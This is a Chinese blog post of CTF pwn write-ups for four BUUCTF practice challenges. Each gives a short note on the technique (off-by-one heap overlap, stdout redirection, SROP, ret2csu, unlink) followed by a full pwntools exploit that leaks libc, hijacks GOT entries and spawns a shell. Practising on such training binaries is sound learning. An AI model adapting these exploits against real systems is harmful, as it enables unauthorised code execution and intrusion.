PWN-PRACTICE-BUUCTF-17

最新推荐文章于 2021-09-13 11:02:33 发布
最新推荐文章于 2021-09-13 11:02:33 发布
阅读量153 收藏
点赞数
分类专栏: Pwn-BUUCTF 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/120114155
版权

PWN-PRACTICE-BUUCTF-17

hitcontraining_heapcreator

单字节溢出,修改下一个chunk的size,造成chunk overlap,实现任意地址读写
参考:buuctf hitcontraining_heapcreator HITCON Trainging lab13

# -*- coding:UTF-8 -*-
from pwn import *
#io=process("./heapcreator")
io=remote("node4.buuoj.cn",25331)
elf=ELF("./heapcreator")
libc=ELF("./libc-2.23-16-x64.so")

def create(size,content):
	io.sendlineafter("Your choice :","1")
	io.sendlineafter("Size of Heap : ",str(size))
	io.sendlineafter("Content of heap:",content)
def edit(index,content):
	io.sendlineafter("Your choice :","2")
	io.sendlineafter("Index :",str(index))
	io.sendlineafter("Content of heap : ",content)#单字节溢出
def show(index):
	io.sendlineafter("Your choice :","3")
	io.sendlineafter("Index :",str(index))
def delete(index):
	io.sendlineafter("Your choice :","4")
	io.sendlineafter("Index :",str(index))
def exit():
	io.sendlineafter("Your choice :","5")

heaparray=0x00000000006020A0

#gdb.attach(io)
#pause()

create(0x18,"aaaa")
create(0x10,"bbbb")
create(0x10,"cccc")
create(0x10,"/bin/sh\x00")

#pause()

edit(0,"a"*0x18+"\x81")
delete(1)

#pause()

size="\x08".ljust(8,"\x00")
payload="d"*0x40+size+p64(elf.got["free"])
create(0x70,payload)

#pause()

show(2)
io.recvuntil("Content : ")
free_addr=u64(io.recvuntil("\n")[:-1].ljust(8,"\x00"))
print("free_addr:"+hex(free_addr))
libc_base=free_addr-libc.sym["free"]
system=libc_base+libc.sym["system"]
edit(2,p64(system))
delete(3)

#pause()

io.interactive()

wustctf2020_closed

题目所给的elf文件关闭了标准输出(fd=1)和标准错误(fd=2)
利用重定向将标准输出重定向到标准输入(fd=0)

p1umh0@p1umh0:~/ctf/pwn$ nc node4.buuoj.cn 25787
   __  ___    ______   ___    
  /  |/  /__ /_  __/__<  /_ __
 / /|_/ / _ `// / / __/ /\ \ /
/_/  /_/\_,_//_/ /_/ /_//_\_\ 

HaHaHa!
What else can you do???
exec 1>&0
cat flag
flag{b02e836b-f53a-4c9a-8287-b54b93c7c65f}
^C

ciscn_2019_es_7

栈溢出,SROP或者ret2csu均可
SROP exp:

from pwn import *
context.arch='amd64'
context.os='linux'
#io=process('./ciscn_2019_es_7')
io=remote("node4.buuoj.cn",29577)
elf=ELF('./ciscn_2019_es_7')
rax_0xf=0x4004DA
syscall=0x400517
vuln_addr=0x4004ED
payload='a'*0x10+p64(vuln_addr)
io.send(payload)
io.recv(0x20)
stack_addr=u64(io.recv(6).ljust(8,'\x00'))
print(stack_addr)
binsh_addr=stack_addr-0x118
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = binsh_addr
sigframe.rsi = 0x0
sigframe.rdx = 0x0
sigframe.rsp = stack_addr
sigframe.rip = syscall
payload='/bin/sh\x00'
payload=payload.ljust(0x10,'a')
payload+=p64(rax_0xf)+p64(syscall)+str(sigframe)
io.send(payload)
io.interactive()

ret2csu exp:

from pwn import *
#io=process('./ciscn_2019_es_7')
io=remote("node4.buuoj.cn",29577)
execve_addr=0x4004E2
syscall = 0x400517
part1=0x40059A
part2=0x400580
pop_rdi_ret = 0x00000000004005a3
vuln_addr=0x4004ED
payload='a'*0x10+p64(vuln_addr)
io.sendline(payload)
io.recv(0x20)
stack=u64(io.recv(8))
binsh_addr=stack-0x118
execve_stack=stack-0x110
payload='/bin/sh\x00'+p64(execve_addr)
def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):
	payload  = p64(part1)			# part1 entry pop_rbx_rbp_r12_r13_r14_r15_ret
	payload += p64(0x0)			# rbx must be 0x0
	payload += p64(0x1)			# rbp must be 0x1
	payload += p64(jmp2)			# r12 jump to
	payload += p64(arg3)			# r13  -> rdx    arg3
	payload += p64(arg2)			# r14  -> rsi    arg2
	payload += p64(arg1)			# r15d -> edi    arg1
	payload += p64(part2)			# part2 entry will call [r12+rbx*0x8]
	payload += 'A' * 56			# junk 6*8+8=56
	return payload
payload+=com_gadget(part1,part2,execve_stack,0,0,0)
payload+=p64(pop_rdi_ret)+p64(binsh_addr)+p64(syscall)
io.sendline(payload)
io.interactive()

hitcon2014_stkof

利用small bin 的 unlink实现任意地址读写,参考:前端 Unlink笔记&2014 HITCON stkof题解

# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./stkof")
io=remote("node4.buuoj.cn",29090)
elf=ELF("./stkof")
libc=ELF("./libc-2.23-16-x64.so")
free_got=elf.got["free"]
puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
atoi_got=elf.got["atoi"]

def create(size):
	io.sendline("1")
	io.sendline(str(size))
	io.recvuntil("OK\n")
def fill(index,size,content):
	io.sendline("2")
	io.sendline(str(index))
	io.sendline(str(size))
	io.send(content)
	#io.recvuntil("OK\n")
def free(index):
	io.sendline("3")
	io.sendline(str(index))
	#io.recvuntil("OK\n")
def show(index):
	io.sendline("4")
	io.sendline(str(index))
	io.recvuntil("OK\n")

#gdb.attach(io)
#pause()

s=0x0000000000602140
create(0x100)#chunk1
create(0x30)#chunk2
create(0x80)#chunk3
FD=s+16-0x18
BK=s+16-0x10
payload=p64(0)+p64(0x30)+p64(FD)+p64(BK)
payload=payload.ljust(0x30,"A")
payload+=p64(0x30)+p64(0x90)
fill(2,len(payload),payload)

#pause()

free(3)

#pause()

payload="a"*0x10+p64(free_got)+p64(puts_got)+p64(atoi_got)
fill(2,len(payload),payload)
fill(1,len(p64(puts_plt)),p64(puts_plt))

#pause()

free(2)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym["puts"]
system=libc_base+libc.sym["system"]
fill(3,len(p64(system)),p64(system))
io.sendline("/bin/sh\x00")
#pause()

io.interactive()
P1umH0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
PWN-PRACTICE-BUUCTF-30
P1umH0的博客
09-13 144
PWN-PRACTICE-BUUCTF-30suctf_2018_stackwdb_2018_3rd_soEasy[BSidesCF 2019]Runitqctf2018_stack2 suctf_2018_stack 栈溢出,ret2text,返回地址不能直接是next_door的起始地址 设置返回地址为0x40067A,开始设置系统调用的参数以及系统调用号 from pwn import * #context.log_level='debug' #io=process('./SUCTF_2018_sta
PWN-PRACTICE-BUUCTF-12
P1umH0的博客
08-08 125
PWN-PRACTICE-BUUCTF-12cmcc_simpleroppicoctf_2018_buffer overflow 2babyfengshui_33c3_2016xdctf2015_pwn200 cmcc_simplerop 静态编译的32位elf,找一个"int 80h"执行系统调用 前提是利用栈溢出读入字符串"/bin/sh\x00",然后找pop给寄存器赋值,最后"int 80h" from pwn import * io = remote('node4.buuoj.cn',27587)
PWN-PRACTICE-BUUCTF-7
P1umH0的博客
08-07 177
PWN-PRACTICE-BUUCTF-7jarvisoj_fmciscn_2019_s_3bjdctf_2020_babystack2[HarekazeCTF2019]baby_rop2 jarvisoj_fm ciscn_2019_s_3 bjdctf_2020_babystack2 [HarekazeCTF2019]baby_rop2
PWN-PRACTICE-BUUCTF-22
P1umH0的博客
09-08 416
PWN-PRACTICE-BUUCTF-22hitcontraining_unlinkpicoctf_2018_leak_mesuctf_2018_basic pwnaxb_2019_brop64 hitcontraining_unlink unlink,参考:[BUUCTF]PWN——hitcontraining_unlink # -*- coding:utf-8 -*- from pwn import * #io=process("./bamboobox") io=remote("node4.buuoj
PWN-PRACTICE-BUUCTF-4
P1umH0的博客
08-05 102
PWN-PRACTICE-BUUCTF-4
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
pwn-200题目文件
02-16
pwn-200题目文件
PWN-PRACTICE-BUUCTF-25
P1umH0的博客
09-10 716
PWN-PRACTICE-BUUCTF-25wustctf2020_name_your_catciscn_2019_final_2mrctf2020_shellcode_revengezctf2016_note2 wustctf2020_name_your_cat 通过数组越界写返回地址为后门shell的地址 from pwn import * #io=process('./wustctf2020_name_your_cat') io=remote('node4.buuoj.cn',28864) elf=E
PWN-PRACTICE-BUUCTF-23
P1umH0的博客
09-09 588
PWN-PRACTICE-BUUCTF-23gyctf_2020_some_thing_excetingaxb_2019_heap[极客大挑战 2019]Not Badinndy_echo gyctf_2020_some_thing_exceting 程序读取了flag到bss段上的0x6020A8地址处 存在uaf漏洞,利用fastbins的LIFO原则,create大小合适的chunk并free 再次create,将0x6020A8覆写到之前create并free掉的chunk里,最后show即可打印出
PWN-PRACTICE-BUUCTF-29
P1umH0的博客
09-12 232
PWN-PRACTICE-BUUCTF-29actf_2019_babyheapwustctf2020_easyfast强网杯2019 拟态 STKOFhitcon_2018_children_tcache actf_2019_babyheap UAF,创建两个非0x10大小的chunk,比如两个0x20 程序会创建四个chunk,大小依次为0x10,0x20,0x10,0x20 按序free掉创建的chunk,两个0x10大小的chunk形成一条链,两个0x20大小的chunk形成一条链 再创建一个0x1
PWN-PRACTICE-BUUCTF-24
P1umH0的博客
09-09 211
PWN-PRACTICE-BUUCTF-24
PWN-PRACTICE-BUUCTF-21
P1umH0的博客
09-08 206
PWN-PRACTICE-BUUCTF-21wdb_2018_2nd_easyfmtciscn_2019_es_1axb_2019_fmt64x_ctf_b0verfl0w wdb_2018_2nd_easyfmt 格式化字符串漏洞 第一次printf通过printf_got将printf的实际地址打印出来,计算libc基地址,得到system的实际地址 第二次printf通过printf_got将printf的实际地址改写为system的实际地址,这样之后的printf实际上是执行的system 第三次输
PWN-PRACTICE-BUUCTF-2
P1umH0的博客
07-23 182
PWN-PRACTICE-BUUCTF-2pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1[第五空间2019 决赛]PWN5 pwn1_sctf_2016 main函数中执行vuln函数 fgets限制了输入的长度,不足以构成栈溢出 通过将输入中的字符"I"替换成"you",增加长度,使满足栈溢出 同时可执行文件存在后门函数get_flag 构造payload,覆盖eip到get_flag即可得到flag from pwn import * #io=process(
PWN-PRACTICE-BUUCTF-1
P1umH0的博客
07-04 172
PWN-PRACTICE-BUUCTF-1
PWN-PRACTICE-BUUCTF-20
P1umH0的博客
09-07 167
PWN-PRACTICE-BUUCTF-20actf_2019_babystackpicoctf_2018_can_you_gets_mepicoctf_2018_got_shellmrctf2020_easy_equation actf_2019_babystack 两次栈迁移 # -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" #io=process("./ACTF_2019_babystack") io=remote(
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值